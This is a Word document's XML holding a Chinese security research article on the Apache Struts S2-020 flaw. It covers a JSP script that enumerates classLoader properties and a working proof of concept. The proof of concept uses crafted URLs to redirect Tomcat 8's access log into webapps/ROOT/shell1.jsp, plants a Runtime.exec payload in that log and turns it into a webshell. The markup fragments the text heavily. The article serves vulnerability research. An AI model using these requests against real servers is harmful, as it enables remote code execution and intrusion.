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Struts S2-020</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>这个通告已经公布有一段时间了。目前大家都知道这个漏洞可以造成</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7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DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>、文件下载等危害，相信各大厂商也已经采取了相应的安全措施。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今天是和大家分享一下对这个漏洞的一点研究，包括如何在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Tomcat 8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下导致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RCE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，目的是抛砖引玉，有不足之处欢迎大家指出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009806D7" w:rsidRPr="009806D7" w:rsidRDefault="009806D7" w:rsidP="009806D7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262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>1.属性列举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这个漏洞分析的一个难点在于：通过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ognl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class.xx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这种方式来遍历属性时，得到的是实际运行环境中的动态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class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，因此仅作静态分析是很困难的。例如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classLoader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，在不同容器中就各不相同。于是我编写了一个小脚本来自动枚举这样的属性：（这段脚本只考虑了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int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、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string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与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boolean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这些基本属性，未考虑数组等复杂的情况，实际情况下结果会更多）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&lt;%@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page language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"java"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import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"java.lang.reflect.*"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%&gt;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&lt;%!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public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void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processClass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Object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instance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javax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servlet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jsp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JspWriter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out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java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util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HashSet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set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String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poc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try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&lt;?&gt;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c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instance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set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add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instance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Method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[]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allMethods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c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getMethods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for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Method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m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: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allMethods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(!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startsWith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"set"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(!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toGenericString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startsWith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"public"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lastRenderedPageBreak/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&lt;?&gt;[]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pType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getParameterTypes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pType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length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!=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1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pType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[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0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].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equals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"java.lang.String"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)||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pType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[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0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].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equals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"boolean"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)||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pType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[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0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].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equals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"int"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String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fieldName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substring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3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4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toLowerCase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()+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substring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4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out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print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poc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+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"."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+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fieldName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+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"&lt;br&gt;"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for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Method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m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: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allMethods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(!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startsWith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"get"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(!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toGenericString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startsWith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"public"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&lt;?&gt;[]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pType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getParameterTypes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pType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length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!=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0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getReturnType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Void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TYPE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Object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o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invoke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instance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o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!=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null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set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contains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o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continue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lastRenderedPageBreak/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processClass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o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out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set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poc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+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"."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+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substring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3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4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toLowerCase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()+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substring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4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));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catch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java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io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IOException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printStackTrace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catch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java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lang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IllegalAccessException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printStackTrace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catch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java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lang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reflect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InvocationTargetException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  <w:t>    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printStackTrace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ab/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%&gt;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&lt;%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java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util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HashSet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set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new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java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util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HashSet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Object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&gt;();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String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poc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"class.classLoader"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example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HelloWorld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action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new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example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HelloWorld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processClass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action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out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set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,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poc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%&gt;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在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tomcat 8.0.3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下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Struts2.3.16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blank app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中执行这段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jsp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，输出结果如下：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br/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（省略部分非相关属性）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encoding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directory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checkExists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lastRenderedPageBreak/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renameOnRotate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fileDateFormat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prefix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rotatable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buffered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suffix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locale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requestAttributesEnabled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enabled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conditionUnless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conditionIf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pattern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condition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asyncSupported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domain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next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asyncSupported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next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domain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next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next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asyncSupported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next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next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domain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......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这意味着Tomcat 8下至少有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200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多个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boolean、int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或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string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类型的属性是可以操纵的，虽然可修改不一定会产生危害，但至少说明这个漏洞的潜在风险不小。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009806D7" w:rsidRPr="009806D7" w:rsidRDefault="009806D7" w:rsidP="009806D7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262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2.POC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lastRenderedPageBreak/>
        <w:t>经过分析发现，通过下面的方法可以造成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webshell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的效果，最终导致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Tomcat下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RCE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。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br/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上面的属性中，有几个控制在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tomcat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上生成的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access log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的文件名，其默认值如下：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directory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logs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prefix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localhost_access_log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suffix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txt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fileDateFormat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yyyy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-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mm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-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dd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 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默认情况下，生成的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access log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位于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 logs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目录（与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webapps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平行）下，文件名是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localhost_access_log.2014-03-09.txt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，但通过修改上面的属性值，可以导致在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webapps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目录下写入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jspwebshell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。具体步骤如下（以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struts 2.3.16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下的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blank app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为例）：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1.访问下面的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url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来改变属性：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http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT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http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.prefix=shell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http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp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2.访问下面的url来触发tomcat切换log（这里有个坑，这个属性必须是数字,这里设定为1），那么从此开始tomcat的access log将被记录入 webapps/ROOT/shell1.jsp中：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lastRenderedPageBreak/>
        <w:t>http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1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3.通过发包访问下面的请求，在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access log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中植入代码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http://127.0.0.1/struts2-blank/example/aaaa.jsp?a=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&lt;%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Runtime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getRuntime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().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exec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"calc"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);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%&gt;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访问上述请求后，就可以看到生成了webapps/ROOT/shell1.jsp，内容如下：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center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微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="069AEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6572250" cy="838200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="http://image.3001.net/images/ue/36481396754175.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId8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3001.net/images/ue/36481396754175.jpg">
                      <a:hlinkClick r:id="rId8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4.结合前面设定的参数，访问下面的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url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，观察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shell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执行</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7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http://127.0.0.1/shell1.jsp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微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="069AEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="12122150" cy="4597400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://image.3001.net/images/ue/74681396754177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3001.net/images/ue/74681396754177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通过分析，上面的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POC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中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class.classLoader.resources.context.parent.pipeline.first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这个属性实际是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org.apache.catalina.valves.AccessLogValve，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在conf/server.xml里面有一段相关的配置：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93A1A1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&lt;!-- Access log processes allexample.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93A1A1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             Documentation at:/docs/config/valve.html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             Note: The pattern used isequivalent to using pattern="common" --&gt;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</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;ValveclassName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"org.apache.catalina.valves.AccessLogValve"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directory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"logs"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 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prefix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"localhost_access_log"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suffix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".txt"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  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pattern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DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"%h %l %u %t&amp;quot;%r&amp;quot; %s %b"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333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/&gt;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为何修改了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dataformat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会触发切换日志呢？注意下面一个属性，默认是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true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lastRenderedPageBreak/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class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classLoader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resources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context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parent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pipeline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first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rotatable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每次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Log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时，都会调用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rotate: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publicvoid log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CharArrayWriter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message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rotate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…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而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rotate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是检查当前的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systime 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经过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format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后，与当前的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tsDate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是否相同。如果日期不同了，自然需要切换日志文件了：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public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void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rotate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rotatable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long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systime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System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currentTimeMillis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systime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-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rotationLastChecked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&gt;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1000L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synchronized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systime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-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rotationLastChecked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&gt;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195F91"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1000L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rotationLastChecked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systime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String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tsDate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fileDateFormatter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format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new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008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Date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systime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if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(!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dateStamp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equals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tsDate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)){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  close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true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  </w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="1E347B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>this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.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dateStamp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tsDate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    open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();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lastRenderedPageBreak/>
        <w:t>        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 w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="48484C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="93A1A1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}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而我们之前已经修改了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dateFormat</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="585858"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，所以就触发了日志切换。这个特性与具体的OS无关，是tomcat代码决定的。在linux与windows下证实该问题均存在。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009806D7" w:rsidRPr="009806D7" w:rsidRDefault="009806D7" w:rsidP="009806D7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="225" w:after="225"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/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</w:pPr>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3.后记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这个POC距离实际的攻击还有一定的距离，发表此文仅供技术研究使用，请勿用于实际攻击。另外，也许还有其他的利用方式，Tomcat 8下那么多的可操控的属性，或许有别的也可以RCE？其他的容器下，是否也有这么多的可操控属性呢？欢迎感兴趣的同学与我们BSRC的同学讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009806D7" w:rsidRPr="009806D7" w:rsidRDefault="009806D7" w:rsidP="009806D7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 xml:space="preserve">[via </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:tooltip="" w:history="1">
        <w:r w:rsidRPr="009806D7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sec.baidu.com</w:t>
        </w:r>
      </w:hyperlink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 作者：</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7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neobyte</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7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]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A00" w:rsidRDefault="00231A00" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00231A00" w:rsidRDefault="00231A00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9806D7">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>9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9806D7">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>9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A00" w:rsidRDefault="00231A00" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00231A00" w:rsidRDefault="00231A00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231A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231A00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231A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6F66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31A00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06D7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76F66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ADD7E37-FB52-4AEE-8187-C0EFAB4C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9806D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06D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06D7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06D7"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs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9806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806D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80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6D7"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="str">
    <w:name w:val="str"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kwd">
    <w:name w:val="kwd"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="typ">
    <w:name w:val="typ"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="lit">
    <w:name w:val="lit"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009806D7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9806D7"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="com">
    <w:name w:val="com"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tag">
    <w:name w:val="tag"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="atv">
    <w:name w:val="atv"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="atn">
    <w:name w:val="atn"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0098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3001.net/images/ue/63911396754080.jp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c.baidu.com/index.php?research/detail/id/18&amp;qq-pf-to=pcqq.group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mage.3001.net/images/ue/74681396754177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48D13-BD27-43EA-8B23-8D14377E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2016-12-05T16:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-05T16:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>